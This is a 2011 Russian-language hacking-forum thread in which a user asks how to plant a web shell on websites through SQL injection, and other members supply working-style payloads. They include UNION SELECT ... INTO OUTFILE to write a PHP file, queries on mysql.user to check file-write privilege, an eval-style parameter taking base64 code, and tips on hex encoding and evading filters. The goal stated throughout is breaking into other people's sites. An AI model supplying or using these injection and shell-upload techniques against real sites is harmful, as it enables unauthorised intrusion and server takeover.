ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   На счет заливки шела через eval (https://forum.antichat.xyz/showthread.php?t=303155)

nikitos2401 14.11.2011 17:47

Ребят подскажите что делать вот например есть сайт доступ в базу есть хочу залить на сайт через это) и тут возникли 2 вопроса

1) как узнать есть ли у пользователя доступ на запись?

2) если узнаю пути как далее действовать?

это?

Код:

http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php
и как потом залить фаил на шелл если все получится?

Mr.Snuffer 14.11.2011 18:06

Цитата:

Сообщение от nikitos2401
Ребят подскажите что делать вот например есть сайт доступ в базу есть хочу залить на сайт через это) и тут возникли 2 вопроса
1) как узнать есть ли у пользователя доступ на запись?
2) если узнаю пути как далее действовать?
это?
Код:

http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php
и как потом залить фаил на шелл если все получится?

Код:

http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php
Лучше так.

И в 1.php?e=(строка зашифрованая в бэйс64)

А код

типа

tabletkO 14.11.2011 18:12

Цитата:

Сообщение от None
1) как узнать есть ли у пользователя доступ на запись?

Код:

http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,file_priv,5,6 from mysql.user where user='текущий юзер'+--+

nikitos2401 14.11.2011 20:39

Ребят не работает 99999+and+1=0+union+select+1,2,3,file_priv,5,6,7,8 ,9+from+mysql.user+where+user='user' но проходит ошибка и ничего не выводится)

Faaax 15.11.2011 00:34

'user' -- попробуй в Hex закодировать

aydin-ka 15.11.2011 00:39

1) Если на сервере сидит 2 и более юзеров, то запрос

99999+and+1=0+union+select+1,2,3,file_priv,5,6,7,8 ,9+from+mysql.user Если появиться Y то заливай шелл, если нет, то пока...

2) 1 юзер запрос 99999+and+1=0+union+select+1,2,3,file_priv,5,6,7,8 ,9+from+mysql.user+where+user='root'

nikitos2401 15.11.2011 01:03

в hex не помогло) а такая фигня почти на всех сайтах ничего не хочет показывать) ппц

aydin-ka 15.11.2011 01:10

Цитата:

Сообщение от nikitos2401
в hex не помогло) а такая фигня почти на всех сайтах ничего не хочет показывать) ппц

Нет не на всех. Значит где-то фильтруется запрос...скорее всего + или другой знак...но все таки можно залить шелл.

nikitos2401 15.11.2011 09:16

Цитата:

Сообщение от aydin-ka
Нет не на всех. Значит где-то фильтруется запрос...скорее всего
+
или другой знак...но все таки можно залить шелл.

так а каким методом тогда его залить? ведь если фильтрация то запрос не пройдет) и следовательно не создастся файл

Gorev 15.11.2011 10:32

этот вопрос уже столько раз обсуждался на форуме, что тошно уже от него..твоя тема уже наверное тысячная, без линка никто тебе не скажет как залить шелл .


Время: 20:39